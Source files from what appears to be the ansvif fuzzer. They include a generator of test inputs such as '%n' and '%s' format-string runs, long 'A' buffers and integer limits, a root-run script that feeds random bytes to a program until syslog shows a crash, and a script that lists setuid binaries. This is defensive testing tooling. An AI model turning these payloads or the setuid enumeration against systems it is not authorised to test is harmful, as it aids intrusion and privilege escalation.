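   * called when no int can be read, and again when anything follows
   * the number.
   * NOTE(review): if help_me() returns instead of exiting, a value that
   * failed the first check still reaches atoi() -- confirm that
   * help_me() does not return.
   */
  std::istringstream b_size(ints);
  int is_int_b_s;
  if (!(b_size >> is_int_b_s)) {
    help_me(my_prog);
  }
  char buf_char_maybe_b_s;
  if (b_size >> buf_char_maybe_b_s) {
    /* trailing characters after the number */
    help_me(my_prog);
    return (0);
  }
  /* for compatibility with cygwin */
  return atoi(ints.c_str());
}

--------------------------------------------------------------------------------
/src/trash.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cstdlib>
#include <cstring>
#include <fstream>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <stdio.h>
#include <string>
#include <thread>
#include <unistd.h>
#include <vector>

int rand_me_plz(int rand_from, int rand_to);

char fortune_cookie() {
  /* Return one random hex digit.
   * The original indexed the 16 digit table with rand_me_plz(0, 255),
   * which reads far past the end of the string literal. The index is
   * now limited to 0..15, which stays inside the table whether the
   * upper bound of rand_me_plz() is inclusive or not.
   */
  const char *hex_digits = "0123456789ABCDEF";
  return (hex_digits[rand_me_plz(0, 15)]);
}

/* Repeat token count times; a count of zero or less gives "". */
static std::string repeat_token(const char *token, int count) {
  std::string out;
  for (int n = 0; n < count; n++) {
    out += token;
  }
  return out;
}

/* Build a string of count characters taken from fortune_cookie(). */
static std::string random_digits(int count) {
  std::string out;
  for (int n = 0; n < count; n++) {
    out += fortune_cookie();
  }
  return out;
}

/* Join user_junk and filler (user_junk first when user_first is true)
 * and cut the result to buf characters, keeping the front when
 * user_junk leads and the tail when it trails.
 * The length test is done in unsigned arithmetic, as before: a negative
 * buf or a user_junk longer than buf wraps to a very large number, and
 * with an empty user_junk the filler is never longer than buf, so all
 * three give "OOR".
 */
static std::string fit_junk(const std::string &user_junk,
                            const std::string &filler, int buf,
                            bool user_first) {
  std::string junk = user_first ? user_junk + filler : filler + user_junk;
  if (buf - user_junk.length() < junk.size()) {
    return user_first ? junk.substr(0, buf)
                      : junk.substr(junk.length() - buf);
  }
  return "OOR";
}

std::string trash_generator(int trash, int buf, std::string user_junk,
                            std::string opt_other_str, bool never_rand) {
  /* Produce one piece of test input.
   * trash selects the kind of input, buf is the target length for the
   * repeated and random kinds, user_junk is text supplied by the user,
   * opt_other_str is returned as is for selector 0x13, and never_rand
   * turns the random kinds into an empty string.
   * Returns "OOR" for an unknown selector or when user_junk does not
   * fit (see fit_junk).
   */
  std::string junk = "";

  switch (trash) {
  case 0x00: junk = repeat_token("A", buf); break;
  case 0x01: junk = "-1"; break;
  case 0x02: junk = "1"; break;
  case 0x03: junk = "0"; break;
  /* The label read 0x040 (decimal 64), which left selector 4 falling
   * through to "OOR". Both values are accepted so that existing
   * callers keep working.
   */
  case 0x04:
  case 0x40: junk = "2"; break;
  /* NOTE(review): streaming the int 0x00 yields the text "0", the
   * same as selector 0x03, not a NUL byte.
   */
  case 0x05: junk = std::to_string(0x00); break;
  case 0x06: junk = repeat_token("%s", buf / 2); break;
  case 0x07: junk = repeat_token("%n", buf / 2); break;
  case 0x08:
    if (never_rand == false) {
      junk = random_digits(buf);
    }
    break;
  /* user_junk in front, result cut to the first buf characters */
  case 0x09: return fit_junk(user_junk, repeat_token("A", buf), buf, true);
  case 0x0A:
    return fit_junk(user_junk, repeat_token("%s", buf / 2), buf, true);
  case 0x0B:
    if (never_rand == false) {
      return fit_junk(user_junk, random_digits(buf), buf, true);
    }
    break;
  /* user_junk at the end, result cut to the last buf characters */
  case 0x0C: return fit_junk(user_junk, repeat_token("A", buf), buf, false);
  case 0x0D:
    return fit_junk(user_junk, repeat_token("%s", buf / 2), buf, false);
  case 0x0E:
    if (never_rand == false) {
      return fit_junk(user_junk, random_digits(buf), buf, false);
    }
    break;
  case 0x0F:
    return fit_junk(user_junk, repeat_token("%n", buf / 2), buf, false);
  case 0x10: junk = std::to_string(rand_me_plz(0, 9999)); break;
  case 0x11: {
    /* two draws, integer part first */
    std::string int_part = std::to_string(rand_me_plz(0, 9999));
    std::string frac_part = std::to_string(rand_me_plz(0, 9999));
    junk = int_part + "." + frac_part;
    break;
  }
  case 0x12: junk = "\"\""; break;
  case 0x13: junk = opt_other_str; break;
  /* fixed strings: limits of the common integer widths and the
   * values next to them
   */
  case 0x14: junk = "-32768"; break;
  case 0x15: junk = "32767"; break;
  case 0x16: junk = "-2147483648"; break;
  case 0x17: junk = "2147483647"; break;
  case 0x18: junk = "-9223372036854775808"; break;
  case 0x19: junk = "9223372036854775807"; break;
  case 0x1A: junk = "65535"; break;
  case 0x1B: junk = "65536"; break;
  case 0x1C: junk = "4294967295"; break;
  case 0x1D: junk = "18446744073709551615"; break;
  case 0x1E: junk = "18446744073709551616"; break;
  case 0x1F: junk = "127"; break;
  case 0x20: junk = "255"; break;
  case 0x21: junk = "256"; break;
  default: return ("OOR");
  }

  /* return the junk to put in between the args */
  return (junk);
}

std::string make_garbage(int trash, int buf, std::string opt_other_str,
                         bool is_other, bool never_rand) {
  /* Call trash_generator() with buf - 1 and wrap the result in single
   * quotes. When stdin is not a terminal, one line is read from it and
   * passed on as the user supplied junk. opt_other_str is passed on
   * only when is_other is true.
   * The quotes are added without escaping: a ' inside the junk ends
   * the quoting if the result is later placed on a shell command line.
   * The "OOR" marker is quoted too, so callers receive "'OOR'".
   */
  buf = buf - 1;
  std::string user_stuff = "";
  if (!isatty(STDIN_FILENO)) {
    getline(std::cin, user_stuff);
  }
  std::string all_junk = trash_generator(
      trash, buf, user_stuff, is_other ? opt_other_str : "", never_rand);
  /* return all the junk the trash generator made */
  return ("'" + all_junk + "'");
}
--------------------------------------------------------------------------------
/src/version.h:
--------------------------------------------------------------------------------
#ifndef version_h
#define version_h

#include <string>
/* what version of ansvif are we running? */
extern std::string ver;

#endif
--------------------------------------------------------------------------------
/src/win/printf.c:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Print the bytes named by argv[1], which is read as a run of four
 * character groups (backslash, x, two hex digits). Only the two digits
 * of each group are looked at; a pair that is not hex is printed as
 * byte 0 because strtol() returns 0 for it.
 * Returns 1 and prints the usage line when no argument is given.
 */
int main(int argc, char *argv[]) {
  size_t len, i;
  char tmp[3];
  if (argc < 2) {
    printf("USAGE: printf.exe \\x41\\x42\n");
    return 1;
  }
  tmp[2] = '\0';
  /* measure once instead of on every pass of the loop */
  len = strlen(argv[1]);
  for (i = 2; i < len; i += 4) {
    /* strncpy pads with NUL when only one character is left */
    strncpy(tmp, argv[1] + i, 2);
    printf("%c", (char)strtol(tmp, NULL, 16));
  }
  return 0;
}
--------------------------------------------------------------------------------
/src/write_file.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

//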
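// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#ifdef __unix
#include "version.h"
#endif
#ifdef _WIN32
#include "version.h"
#endif
#include <cstdlib>
#include <fstream>
#include <iostream>
#include <random>
#include <regex>
#include <signal.h>
#include <stdio.h>
#include <sys/stat.h>
#include <thread>
#include <unistd.h>
#include <vector>

#define READ 0
#define WRITE 1

std::string make_garbage(int trash, int buf, std::string opt_other_str,
                         bool is_other, bool never_rand);
std::string trash_generator(int trash, int buf, std::string user_junk,
                            std::string opt_other_str, bool never_rand);
int rand_me_plz(int rand_from, int rand_to);
void help_me(std::string mr_me);

void write_seg(std::string filename, std::string line) {
  /* Append line and a newline to filename, creating the file if
   * needed. Used mostly for logging and for writing the junk files.
   * A failed open is not reported.
   */
  std::ofstream w_f(filename, std::ios::out | std::ios::app);
  w_f << line << std::endl;
  w_f.close();
}

void write_junk_file(std::string filename, std::vector<std::string> opt_other,
                     int buf_size, int rand_spec_one, int rand_spec_two,
                     bool never_rand, std::string other_sep, bool verbose) {
  /* Write buf_size + 1 lines of junk to filename, replacing any old
   * file. Each line is a random entry of opt_other, then the output of
   * make_garbage() unless it is the out-of-range marker, then (on a
   * coin flip) other_sep. With verbose set the same lines also go to
   * stderr.
   *
   * Changes from the original:
   *  - make_garbage() wraps its result in single quotes, so the marker
   *    arrives as "'OOR'". The old comparison with "OOR" never matched
   *    and the marker was written into the file.
   *  - an empty opt_other no longer indexes the vector with
   *    size() - 1; the line then starts with the junk.
   *
   * NOTE(review): the old file is removed and the path is opened again
   * by name, so whatever sits at that path at open time is written to.
   * Keep filename in a directory that only the fuzzing user can write.
   * NOTE(review): buf_size below 1 asks rand_me_plz() for the range
   * (1, buf_size); what it does with that is not visible here.
   */
  remove(filename.c_str());
  std::ofstream w_f;
  w_f.open(filename, std::ios::out | std::ios::app);
  for (int start_buf = 0; start_buf <= buf_size; start_buf++) {
    std::string oscar;
    if (!opt_other.empty()) {
      oscar = opt_other.at(rand_me_plz(0, opt_other.size() - 1));
    }
    int trash_kind = rand_me_plz(rand_spec_one, rand_spec_two);
    int trash_len = rand_me_plz(1, buf_size);
    std::string trash =
        make_garbage(trash_kind, trash_len, "", false, never_rand);
    /* build the line once so the file and the terminal get the same text */
    std::string out_line = oscar;
    if (trash != "'OOR'") {
      out_line += trash;
    }
    if (rand_me_plz(0, 1) == 1) {
      out_line += other_sep;
    }
    w_f << out_line << std::endl;
    if (verbose == true) {
      std::cerr << out_line << std::endl;
    }
  }
  /* make sure to close it out */
  w_f.close();
}
--------------------------------------------------------------------------------
/tmp/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/tmp/.gitkeep
--------------------------------------------------------------------------------
/tools/bermise_fuzz.sh:
--------------------------------------------------------------------------------
## bermise_fuzz
## Part of the ansvif tool chain
## __ _ _ __ ___ __ ____ ____
## / ( \/ )/ _\ / __)/ _\/ ___(_ _)
## ( O ) (/ ( (_ / \___ \ )(
## \__(_/\_\_/\_/\___\_/\_(____/(__)

## This should be run as root to operate
## correctly if using things like netcat
## because we have to read /var/log/syslog
## to detect service crashes.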
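
if [ $# -eq 0 ]
then
  echo "ansvif toolchain -- A Not So Very Intelligent Fuzzer";
  echo "Usage:";
  echo " $0 iconv -f Unicode";
  echo " $0 nc 127.0.0.1 22";
  exit 0;
fi;


# You can comment this out if you know what
# you're doing.
if [ "$(whoami)" != "root" ]
then
  echo "Not root, exiting.";
  exit 0;
fi;

# Number of random bytes fed to the target on each run.
mupr="64";

# The working files below are created in the current directory under
# fixed names while running as root, so start this from a directory
# that only root can write to.

# Crash lines already in syslog before we start; a higher count later
# means a new crash was logged.
syslog_crashes=$(grep -c "traps:\|segfault" /var/log/syslog);
binname="$1";
binshort=$(printf '%s\n' "$binname" | awk -F "/" '{print $NF}')
echo "fuzzing $binname";
randchars=1;
# randchars is never changed, so this loops until a crash is seen.
while [ $randchars -le 2 ]
do
  # Write the random bytes straight to the file. A shell variable
  # cannot hold NUL bytes and an unquoted expansion is split and
  # glob-expanded, so the saved buffer would not match what the
  # target was given.
  dd if=/dev/urandom of="$binshort.tmp" bs=1 count="$mupr" 2>/dev/null;
  # Run the target on that buffer with a half second limit and keep
  # its output for the report. The earlier "sleep; killall" ran to
  # completion before the target was started and, as root, would have
  # ended every process with the same name.
  timeout 0.5 "$@" < "$binshort.tmp" > "$binshort.out.bf" 2>&1; echo $?;
  mv "$binshort.tmp" "$binshort.crash.bf";
  cat "$binshort.out.bf";
  if [ "$(grep -c "traps:\|segfault" /var/log/syslog)" -gt "$syslog_crashes" ]
  then
    grep "traps:" /var/log/syslog | tail -n 1;
    break;
  fi;
done;
echo "Crash found!"
echo "Crash buffer left in: $binshort.crash.bf";
echo "Crash output left in: $binshort.out.bf";
echo;
echo "Crash data:";
od -x "./$binshort.crash.bf";
--------------------------------------------------------------------------------
/tools/find_suid.sh:
--------------------------------------------------------------------------------
## find_suid
## Part of the ansvif tool chain
## __ _ _ __ ___ __ ____ ____
## / ( \/ )/ _\ / __)/ _\/ ___(_ _)
## ( O ) (/ ( (_ / \___ \ )(
## \__(_/\_\_/\_/\___\_/\_(____/(__)

if [ $# -eq 0 ]
then
  echo "ansvif toolchain -- A Not So Very Intelligent Fuzzer";
  echo "Usage:";
  echo " $0 /bin /usr/bin";
  exit 0;
fi;
# List regular files under the given directories that have the setuid
# or setgid bit set. "$@" is quoted so that a directory name with
# spaces or glob characters is passed to find as one argument.
find "$@" -type f -perm /6000 2>/dev/null

--------------------------------------------------------------------------------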